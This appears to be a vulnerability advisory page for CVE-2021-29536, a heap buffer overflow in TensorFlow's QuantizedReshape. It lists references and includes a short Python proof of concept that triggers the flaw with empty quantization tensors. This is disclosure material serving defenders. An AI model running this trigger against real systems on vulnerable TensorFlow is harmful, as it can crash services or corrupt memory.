CVE-2021-29536: Heap buffer overflow in `QuantizedReshape`
(updated )
An attacker can cause a heap buffer overflow in QuantizedReshape
by passing in invalid thresholds for the quantization:
import tensorflow as tf
tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
References
- github.com/advisories/GHSA-2gfx-95x2-5v3x
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-464.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-662.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-173.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/a324ac84e573fba362a5e53d4e74d5de6729933e
- github.com/tensorflow/tensorflow/security/advisories/GHSA-2gfx-95x2-5v3x
- nvd.nist.gov/vuln/detail/CVE-2021-29536
Detect and mitigate CVE-2021-29536 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →